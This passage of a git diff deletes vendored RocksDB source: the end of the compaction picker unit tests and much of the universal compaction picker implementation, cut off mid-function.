-  Add(5, 10U, "c", "cc");
-  Add(5, 11U, "h", "k");
-  Add(5, 12U, "y", "yy");
-  Add(5, 13U, "z", "zz");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // case 3.3: Higher levels (level 5) have overlap, but it's only overlapping
-  // one key ("d")
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "j", "k");
-  Add(3, 8U, "l", "m");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  Add(5, 11U, "ccc", "d");
-  Add(5, 12U, "y", "yy");
-  Add(5, 13U, "z", "zz");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // Level 0 files overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "z");
-  Add(0, 4U, "e", "f");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(1, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // Level 0 files don't overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "k");
-  Add(0, 4U, "e", "f");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(1, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // Level 1 files overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "s", "t");
-  Add(0, 2U, "a", "m");
-  Add(0, 3U, "b", "k");
-  Add(0, 4U, "e", "f");
-  Add(1, 5U, "a", "m");
-  Add(1, 6U, "n", "o");
-  Add(1, 7U, "w", "y");
-  Add(5, 10U, "y", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 0);
-  AddToCompactionFiles(1U);
-  AddToCompactionFiles(2U);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(4U);
-  AddToCompactionFiles(5U);
-  AddToCompactionFiles(6U);
-  AddToCompactionFiles(7U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  DeleteVersionStorage();
-}
-
-TEST_F(CompactionPickerTest, MaxCompactionBytesHit) {
-  mutable_cf_options_.max_bytes_for_level_base = 1000000u;
-  mutable_cf_options_.max_compaction_bytes = 800000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2 and 5.
-  // It can expand because adding file 1 and 3, the compaction size will
-  // exceed mutable_cf_options_.max_bytes_for_level_base.
-  Add(1, 1U, "100", "150", 300000U);
-  Add(1, 2U, "151", "200", 300001U, 0, 0);
-  Add(1, 3U, "201", "250", 300000U, 0, 0);
-  Add(1, 4U, "251", "300", 300000U, 0, 0);
-  Add(2, 5U, "100", "256", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, MaxCompactionBytesNotHit) {
-  mutable_cf_options_.max_bytes_for_level_base = 800000u;
-  mutable_cf_options_.max_compaction_bytes = 1000000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2 and 5.
-  // and it expands to file 1 and 3 too.
-  Add(1, 1U, "100", "150", 300000U);
-  Add(1, 2U, "151", "200", 300001U, 0, 0);
-  Add(1, 3U, "201", "250", 300000U, 0, 0);
-  Add(1, 4U, "251", "300", 300000U, 0, 0);
-  Add(2, 5U, "000", "251", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(3U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, IsTrivialMoveOn) {
-  mutable_cf_options_.max_bytes_for_level_base = 10000u;
-  mutable_cf_options_.max_compaction_bytes = 10001u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick file 2
-  Add(1, 1U, "100", "150", 3000U);
-  Add(1, 2U, "151", "200", 3001U);
-  Add(1, 3U, "201", "250", 3000U);
-  Add(1, 4U, "251", "300", 3000U);
-
-  Add(3, 5U, "120", "130", 7000U);
-  Add(3, 6U, "170", "180", 7000U);
-  Add(3, 5U, "220", "230", 7000U);
-  Add(3, 5U, "270", "280", 7000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-    cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_TRUE(compaction->IsTrivialMove());
-}
-
-TEST_F(CompactionPickerTest, IsTrivialMoveOff) {
-  mutable_cf_options_.max_bytes_for_level_base = 1000000u;
-  mutable_cf_options_.max_compaction_bytes = 10000u;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // A compaction should be triggered and pick all files from level 1
-  Add(1, 1U, "100", "150", 300000U, 0, 0);
-  Add(1, 2U, "150", "200", 300000U, 0, 0);
-  Add(1, 3U, "200", "250", 300000U, 0, 0);
-  Add(1, 4U, "250", "300", 300000U, 0, 0);
-
-  Add(3, 5U, "120", "130", 6000U);
-  Add(3, 6U, "140", "150", 6000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-    cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_FALSE(compaction->IsTrivialMove());
-}
-
-TEST_F(CompactionPickerTest, CacheNextCompactionIndex) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  Add(1 /* level */, 1U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 1000000000U /* file_size */);
-  file_map_[1U].first->being_compacted = true;
-  Add(1 /* level */, 2U /* file_number */, "150" /* smallest */,
-      "199" /* largest */, 900000000U /* file_size */);
-  Add(1 /* level */, 3U /* file_number */, "200" /* smallest */,
-      "249" /* largest */, 800000000U /* file_size */);
-  Add(1 /* level */, 4U /* file_number */, "250" /* smallest */,
-      "299" /* largest */, 700000000U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "150" /* smallest */,
-      "199" /* largest */, 1U /* file_size */);
-  file_map_[5U].first->being_compacted = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(0U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2, vstorage_->NextCompactionIndex(1 /* level */));
-
-  compaction.reset(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(0U, compaction->num_input_files(1));
-  ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3, vstorage_->NextCompactionIndex(1 /* level */));
-
-  compaction.reset(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-  ASSERT_EQ(4, vstorage_->NextCompactionIndex(1 /* level */));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compaction_picker_universal.cc b/thirdparty/rocksdb/db/compaction_picker_universal.cc
deleted file mode 100644
index 14533fb..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_universal.cc
+++ /dev/null
@@ -1,748 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_picker_universal.h"
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <queue>
-#include <string>
-#include <utility>
-#include "db/column_family.h"
-#include "monitoring/statistics.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-namespace {
-// Used in universal compaction when trivial move is enabled.
-// This structure is used for the construction of min heap
-// that contains the file meta data, the level of the file
-// and the index of the file in that level
-
-struct InputFileInfo {
-  InputFileInfo() : f(nullptr) {}
-
-  FileMetaData* f;
-  size_t level;
-  size_t index;
-};
-
-// Used in universal compaction when trivial move is enabled.
-// This comparator is used for the construction of min heap
-// based on the smallest key of the file.
-struct SmallestKeyHeapComparator {
-  explicit SmallestKeyHeapComparator(const Comparator* ucmp) { ucmp_ = ucmp; }
-
-  bool operator()(InputFileInfo i1, InputFileInfo i2) const {
-    return (ucmp_->Compare(i1.f->smallest.user_key(),
-                           i2.f->smallest.user_key()) > 0);
-  }
-
- private:
-  const Comparator* ucmp_;
-};
-
-typedef std::priority_queue<InputFileInfo, std::vector<InputFileInfo>,
-                            SmallestKeyHeapComparator>
-    SmallestKeyHeap;
-
-// This function creates the heap that is used to find if the files are
-// overlapping during universal compaction when the allow_trivial_move
-// is set.
-SmallestKeyHeap create_level_heap(Compaction* c, const Comparator* ucmp) {
-  SmallestKeyHeap smallest_key_priority_q =
-      SmallestKeyHeap(SmallestKeyHeapComparator(ucmp));
-
-  InputFileInfo input_file;
-
-  for (size_t l = 0; l < c->num_input_levels(); l++) {
-    if (c->num_input_files(l) != 0) {
-      if (l == 0 && c->start_level() == 0) {
-        for (size_t i = 0; i < c->num_input_files(0); i++) {
-          input_file.f = c->input(0, i);
-          input_file.level = 0;
-          input_file.index = i;
-          smallest_key_priority_q.push(std::move(input_file));
-        }
-      } else {
-        input_file.f = c->input(l, 0);
-        input_file.level = l;
-        input_file.index = 0;
-        smallest_key_priority_q.push(std::move(input_file));
-      }
-    }
-  }
-  return smallest_key_priority_q;
-}
-
-#ifndef NDEBUG
-// smallest_seqno and largest_seqno are set iff. `files` is not empty.
-void GetSmallestLargestSeqno(const std::vector<FileMetaData*>& files,
-                             SequenceNumber* smallest_seqno,
-                             SequenceNumber* largest_seqno) {
-  bool is_first = true;
-  for (FileMetaData* f : files) {
-    assert(f->smallest_seqno <= f->largest_seqno);
-    if (is_first) {
-      is_first = false;
-      *smallest_seqno = f->smallest_seqno;
-      *largest_seqno = f->largest_seqno;
-    } else {
-      if (f->smallest_seqno < *smallest_seqno) {
-        *smallest_seqno = f->smallest_seqno;
-      }
-      if (f->largest_seqno > *largest_seqno) {
-        *largest_seqno = f->largest_seqno;
-      }
-    }
-  }
-}
-#endif
-}  // namespace
-
-// Algorithm that checks to see if there are any overlapping
-// files in the input
-bool UniversalCompactionPicker::IsInputFilesNonOverlapping(Compaction* c) {
-  auto comparator = icmp_->user_comparator();
-  int first_iter = 1;
-
-  InputFileInfo prev, curr, next;
-
-  SmallestKeyHeap smallest_key_priority_q =
-      create_level_heap(c, icmp_->user_comparator());
-
-  while (!smallest_key_priority_q.empty()) {
-    curr = smallest_key_priority_q.top();
-    smallest_key_priority_q.pop();
-
-    if (first_iter) {
-      prev = curr;
-      first_iter = 0;
-    } else {
-      if (comparator->Compare(prev.f->largest.user_key(),
-                              curr.f->smallest.user_key()) >= 0) {
-        // found overlapping files, return false
-        return false;
-      }
-      assert(comparator->Compare(curr.f->largest.user_key(),
-                                 prev.f->largest.user_key()) > 0);
-      prev = curr;
-    }
-
-    next.f = nullptr;
-
-    if (curr.level != 0 && curr.index < c->num_input_files(curr.level) - 1) {
-      next.f = c->input(curr.level, curr.index + 1);
-      next.level = curr.level;
-      next.index = curr.index + 1;
-    }
-
-    if (next.f) {
-      smallest_key_priority_q.push(std::move(next));
-    }
-  }
-  return true;
-}
-
-bool UniversalCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  const int kLevel0 = 0;
-  return vstorage->CompactionScore(kLevel0) >= 1;
-}
-
-void UniversalCompactionPicker::SortedRun::Dump(char* out_buf,
-                                                size_t out_buf_size,
-                                                bool print_path) const {
-  if (level == 0) {
-    assert(file != nullptr);
-    if (file->fd.GetPathId() == 0 || !print_path) {
-      snprintf(out_buf, out_buf_size, "file %" PRIu64, file->fd.GetNumber());
-    } else {
-      snprintf(out_buf, out_buf_size, "file %" PRIu64
-                                      "(path "
-                                      "%" PRIu32 ")",
-               file->fd.GetNumber(), file->fd.GetPathId());
-    }
-  } else {
-    snprintf(out_buf, out_buf_size, "level %d", level);
-  }
-}
-
-void UniversalCompactionPicker::SortedRun::DumpSizeInfo(
-    char* out_buf, size_t out_buf_size, size_t sorted_run_count) const {
-  if (level == 0) {
-    assert(file != nullptr);
-    snprintf(out_buf, out_buf_size,
-             "file %" PRIu64 "[%" ROCKSDB_PRIszt
-             "] "
-             "with size %" PRIu64 " (compensated size %" PRIu64 ")",
-             file->fd.GetNumber(), sorted_run_count, file->fd.GetFileSize(),
-             file->compensated_file_size);
-  } else {
-    snprintf(out_buf, out_buf_size,
-             "level %d[%" ROCKSDB_PRIszt
-             "] "
-             "with size %" PRIu64 " (compensated size %" PRIu64 ")",
-             level, sorted_run_count, size, compensated_file_size);
-  }
-}
-
-std::vector<UniversalCompactionPicker::SortedRun>
-UniversalCompactionPicker::CalculateSortedRuns(
-    const VersionStorageInfo& vstorage, const ImmutableCFOptions& ioptions) {
-  std::vector<UniversalCompactionPicker::SortedRun> ret;
-  for (FileMetaData* f : vstorage.LevelFiles(0)) {
-    ret.emplace_back(0, f, f->fd.GetFileSize(), f->compensated_file_size,
-                     f->being_compacted);
-  }
-  for (int level = 1; level < vstorage.num_levels(); level++) {
-    uint64_t total_compensated_size = 0U;
-    uint64_t total_size = 0U;
-    bool being_compacted = false;
-    bool is_first = true;
-    for (FileMetaData* f : vstorage.LevelFiles(level)) {
-      total_compensated_size += f->compensated_file_size;
-      total_size += f->fd.GetFileSize();
-      if (ioptions.compaction_options_universal.allow_trivial_move == true) {
-        if (f->being_compacted) {
-          being_compacted = f->being_compacted;
-        }
-      } else {
-        // Compaction always includes all files for a non-zero level, so for a
-        // non-zero level, all the files should share the same being_compacted
-        // value.
-        // This assumption is only valid when
-        // ioptions.compaction_options_universal.allow_trivial_move is false
-        assert(is_first || f->being_compacted == being_compacted);
-      }
-      if (is_first) {
-        being_compacted = f->being_compacted;
-        is_first = false;
-      }
-    }
-    if (total_compensated_size > 0) {
-      ret.emplace_back(level, nullptr, total_size, total_compensated_size,
-                       being_compacted);
-    }
-  }
-  return ret;
-}
-
-// Universal style of compaction. Pick files that are contiguous in
-// time-range to compact.
-//
-Compaction* UniversalCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  const int kLevel0 = 0;
-  double score = vstorage->CompactionScore(kLevel0);
-  std::vector<SortedRun> sorted_runs =
-      CalculateSortedRuns(*vstorage, ioptions_);
-
-  if (sorted_runs.size() == 0 ||
-      sorted_runs.size() <
-          (unsigned int)mutable_cf_options.level0_file_num_compaction_trigger) {
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: nothing to do\n",
-                     cf_name.c_str());
-    TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                             nullptr);
-    return nullptr;
-  }
-  VersionStorageInfo::LevelSummaryStorage tmp;
-  ROCKS_LOG_BUFFER_MAX_SZ(
-      log_buffer, 3072,
-      "[%s] Universal: sorted runs files(%" ROCKSDB_PRIszt "): %s\n",
-      cf_name.c_str(), sorted_runs.size(), vstorage->LevelSummary(&tmp));
-
-  // Check for size amplification first.
-  Compaction* c;
-  if ((c = PickCompactionToReduceSizeAmp(cf_name, mutable_cf_options, vstorage,
-                                         score, sorted_runs, log_buffer)) !=
-      nullptr) {
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: compacting for size amp\n",
-                     cf_name.c_str());
-  } else {
-    // Size amplification is within limits. Try reducing read
-    // amplification while maintaining file size ratios.
-    unsigned int ratio = ioptions_.compaction_options_universal.size_ratio;
-
-    if ((c = PickCompactionToReduceSortedRuns(
-             cf_name, mutable_cf_options, vstorage, score, ratio, UINT_MAX,
-             sorted_runs, log_buffer)) != nullptr) {
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Universal: compacting for size ratio\n",
-                       cf_name.c_str());
-    } else {
-      // Size amplification and file size ratios are within configured limits.
-      // If max read amplification is exceeding configured limits, then force
-      // compaction without looking at filesize ratios and try to reduce
-      // the number of files to fewer than level0_file_num_compaction_trigger.
-      // This is guaranteed by NeedsCompaction()
-      assert(sorted_runs.size() >=
-             static_cast<size_t>(
-                 mutable_cf_options.level0_file_num_compaction_trigger));
-      // Get the total number of sorted runs that are not being compacted
-      int num_sr_not_compacted = 0;
-      for (size_t i = 0; i < sorted_runs.size(); i++) {
-        if (sorted_runs[i].being_compacted == false) {
-          num_sr_not_compacted++;
-        }
-      }
-
-      // The number of sorted runs that are not being compacted is greater than
-      // the maximum allowed number of sorted runs
-      if (num_sr_not_compacted >
-          mutable_cf_options.level0_file_num_compaction_trigger) {
-        unsigned int num_files =
-            num_sr_not_compacted -
-            mutable_cf_options.level0_file_num_compaction_trigger + 1;
-        if ((c = PickCompactionToReduceSortedRuns(
-                 cf_name, mutable_cf_options, vstorage, score, UINT_MAX,
-                 num_files, sorted_runs, log_buffer)) != nullptr) {
-          ROCKS_LOG_BUFFER(log_buffer,
-                           "[%s] Universal: compacting for file num -- %u\n",
-                           cf_name.c_str(), num_files);
-        }
-      }
-    }
-  }
-  if (c == nullptr) {
-    TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                             nullptr);
-    return nullptr;
-  }
-
-  if (ioptions_.compaction_options_universal.allow_trivial_move == true) {
-    c->set_is_trivial_move(IsInputFilesNonOverlapping(c));
-  }
-
-// validate that all the chosen files of L0 are non overlapping in time
-#ifndef NDEBUG
-  SequenceNumber prev_smallest_seqno = 0U;
-  bool is_first = true;
-
-  size_t level_index = 0U;
-  if (c->start_level() == 0) {
-    for (auto f : *c->inputs(0)) {
-      assert(f->smallest_seqno <= f->largest_seqno);
-      if (is_first) {
-        is_first = false;
-      }
-      prev_smallest_seqno = f->smallest_seqno;
-    }
-    level_index = 1U;
-  }
-  for (; level_index < c->num_input_levels(); level_index++) {
-    if (c->num_input_files(level_index) != 0) {
-      SequenceNumber smallest_seqno = 0U;
-      SequenceNumber largest_seqno = 0U;
-      GetSmallestLargestSeqno(*(c->inputs(level_index)), &smallest_seqno,
-                              &largest_seqno);
-      if (is_first) {
-        is_first = false;
-      } else if (prev_smallest_seqno > 0) {
-        // A level is considered as the bottommost level if there are
-        // no files in higher levels or if files in higher levels do
-        // not overlap with the files being compacted. Sequence numbers
-        // of files in bottommost level can be set to 0 to help
-        // compression. As a result, the following assert may not hold
-        // if the prev_smallest_seqno is 0.
-        assert(prev_smallest_seqno > largest_seqno);
-      }
-      prev_smallest_seqno = smallest_seqno;
-    }
-  }
-#endif
-  // update statistics
-  MeasureTime(ioptions_.statistics, NUM_FILES_IN_SINGLE_COMPACTION,
-              c->inputs(0)->size());
-
-  RegisterCompaction(c);
-  vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options);
-
-  TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return",
-                           c);
-  return c;
-}
-
-uint32_t UniversalCompactionPicker::GetPathId(
-    const ImmutableCFOptions& ioptions, uint64_t file_size) {
-  // Two conditions need to be satisfied:
-  // (1) the target path needs to be able to hold the file's size
-  // (2) Total size left in this and previous paths need to be not
-  //     smaller than expected future file size before this new file is
-  //     compacted, which is estimated based on size_ratio.
-  // For example, if now we are compacting files of size (1, 1, 2, 4, 8),
-  // we will make sure the target file, probably with size of 16, will be
-  // placed in a path so that eventually when new files are generated and
-  // compacted to (1, 1, 2, 4, 8, 16), all those files can be stored in or
-  // before the path we chose.
-  //
-  // TODO(sdong): now the case of multiple column families is not
-  // considered in this algorithm. So the target size can be violated in
-  // that case. We need to improve it.
-  uint64_t accumulated_size = 0;
-  uint64_t future_size =
-      file_size * (100 - ioptions.compaction_options_universal.size_ratio) /
-      100;
-  uint32_t p = 0;
-  assert(!ioptions.db_paths.empty());
-  for (; p < ioptions.db_paths.size() - 1; p++) {
-    uint64_t target_size = ioptions.db_paths[p].target_size;
-    if (target_size > file_size &&
-        accumulated_size + (target_size - file_size) > future_size) {
-      return p;
-    }
-    accumulated_size += target_size;
-  }
-  return p;
-}
-
-//
-// Consider compaction files based on their size differences with
-// the next file in time order.
-//
-Compaction* UniversalCompactionPicker::PickCompactionToReduceSortedRuns(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, double score, unsigned int ratio,
-    unsigned int max_number_of_files_to_compact,
-    const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer) {
-  unsigned int min_merge_width =
-      ioptions_.compaction_options_universal.min_merge_width;
-  unsigned int max_merge_width =
-      ioptions_.compaction_options_universal.max_merge_width;
-
-  const SortedRun* sr = nullptr;
-  bool done = false;
-  size_t start_index = 0;
-  unsigned int candidate_count = 0;
-
-  unsigned int max_files_to_compact =
-      std::min(max_merge_width, max_number_of_files_to_compact);
-  min_merge_width = std::max(min_merge_width, 2U);
-
-  // Caller checks the size before executing this function. This invariant is
-  // important because otherwise we may have a possible integer underflow when
-  // dealing with unsigned types.
-  assert(sorted_runs.size() > 0);
-
-  // Considers a candidate file only if it is smaller than the
-  // total size accumulated so far.
-  for (size_t loop = 0; loop < sorted_runs.size(); loop++) {
-    candidate_count = 0;
-
-    // Skip files that are already being compacted
-    for (sr = nullptr; loop < sorted_runs.size(); loop++) {
-      sr = &sorted_runs[loop];
-
-      if (!sr->being_compacted) {
-        candidate_count = 1;
-        break;
-      }
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf));
-      ROCKS_LOG_BUFFER(log_buffer,
-                       "[%s] Universal: %s"
-                       "[%d] being compacted, skipping",
-                       cf_name.c_str(), file_num_buf, loop);
-
-      sr = nullptr;
-    }
-
-    // This file is not being compacted. Consider it as the
-    // first candidate to be compacted.
-    uint64_t candidate_size = sr != nullptr ? sr->compensated_file_size : 0;
-    if (sr != nullptr) {
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-      ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Possible candidate %s[%d].",
-                       cf_name.c_str(), file_num_buf, loop);
-    }
-
-    // Check if the succeeding files need compaction.
-    for (size_t i = loop + 1;
-         candidate_count < max_files_to_compact && i < sorted_runs.size();
-         i++) {
-      const SortedRun* succeeding_sr = &sorted_runs[i];
-      if (succeeding_sr->being_compacted) {
-        break;
-      }
-      // Pick files if the total/last candidate file size (increased by the
-      // specified ratio) is still larger than the next candidate file.
-      // candidate_size is the total size of files picked so far with the
-      // default kCompactionStopStyleTotalSize; with
-      // kCompactionStopStyleSimilarSize, it's simply the size of the last
-      // picked file.
-      double sz = candidate_size * (100.0 + ratio) / 100.0;
-      if (sz < static_cast<double>(succeeding_sr->size)) {
-        break;
-      }
-      if (ioptions_.compaction_options_universal.stop_style ==
-          kCompactionStopStyleSimilarSize) {
-        // Similar-size stopping rule: also check the last picked file isn't
-        // far larger than the next candidate file.
-        sz = (succeeding_sr->size * (100.0 + ratio)) / 100.0;
-        if (sz < static_cast<double>(candidate_size)) {
-          // If the small file we've encountered begins a run of similar-size
-          // files, we'll pick them up on a future iteration of the outer
-          // loop. If it's some lonely straggler, it'll eventually get picked
-          // by the last-resort read amp strategy which disregards size ratios.
-          break;
-        }
-        candidate_size = succeeding_sr->compensated_file_size;
-      } else {  // default kCompactionStopStyleTotalSize
-        candidate_size += succeeding_sr->compensated_file_size;
-      }
-      candidate_count++;
-    }
-
-    // Found a series of consecutive files that need compaction.
-    if (candidate_count >= (unsigned int)min_merge_width) {
-      start_index = loop;
-      done = true;
-      break;
-    } else {
-      for (size_t i = loop;
-           i < loop + candidate_count && i < sorted_runs.size(); i++) {
-        const SortedRun* skipping_sr = &sorted_runs[i];
-        char file_num_buf[256];
-        skipping_sr->DumpSizeInfo(file_num_buf, sizeof(file_num_buf), loop);
-        ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Skipping %s",
-                         cf_name.c_str(), file_num_buf);
-      }
-    }
-  }
-  if (!done || candidate_count <= 1) {
-    return nullptr;
-  }
-  size_t first_index_after = start_index + candidate_count;
-  // Compression is enabled if files compacted earlier already reached
-  // size ratio of compression.
-  bool enable_compression = true;
-  int ratio_to_compress =
-      ioptions_.compaction_options_universal.compression_size_percent;
-  if (ratio_to_compress >= 0) {
-    uint64_t total_size = 0;
-    for (auto& sorted_run : sorted_runs) {
-      total_size += sorted_run.compensated_file_size;
-    }
-
-    uint64_t older_file_size = 0;
-    for (size_t i = sorted_runs.size() - 1; i >= first_index_after; i--) {
-      older_file_size += sorted_runs[i].size;
-      if (older_file_size * 100L >= total_size * (long)ratio_to_compress) {
-        enable_compression = false;
-        break;
-      }
-    }
-  }
-
-  uint64_t estimated_total_size = 0;
-  for (unsigned int i = 0; i < first_index_after; i++) {
-    estimated_total_size += sorted_runs[i].size;
-  }
-  uint32_t path_id = GetPathId(ioptions_, estimated_total_size);
-  int start_level = sorted_runs[start_index].level;
-  int output_level;
-  if (first_index_after == sorted_runs.size()) {
-    output_level = vstorage->num_levels() - 1;
-  } else if (sorted_runs[first_index_after].level == 0) {
-    output_level = 0;
-  } else {
-    output_level = sorted_runs[first_index_after].level - 1;
-  }
-
-  // last level is reserved for the files ingested behind
-  if (ioptions_.allow_ingest_behind &&
-      (output_level == vstorage->num_levels() - 1)) {
-    assert(output_level > 1);
-    output_level--;
-  }
-
-  std::vector<CompactionInputFiles> inputs(vstorage->num_levels());
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    inputs[i].level = start_level + static_cast<int>(i);
-  }
-  for (size_t i = start_index; i < first_index_after; i++) {
-    auto& picking_sr = sorted_runs[i];
-    if (picking_sr.level == 0) {
-      FileMetaData* picking_file = picking_sr.file;
-      inputs[0].files.push_back(picking_file);
-    } else {
-      auto& files = inputs[picking_sr.level - start_level].files;
-      for (auto* f : vstorage->LevelFiles(picking_sr.level)) {
-        files.push_back(f);
-      }
-    }
-    char file_num_buf[256];
-    picking_sr.DumpSizeInfo(file_num_buf, sizeof(file_num_buf), i);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Picking %s", cf_name.c_str(),
-                     file_num_buf);
-  }
-
-  CompactionReason compaction_reason;
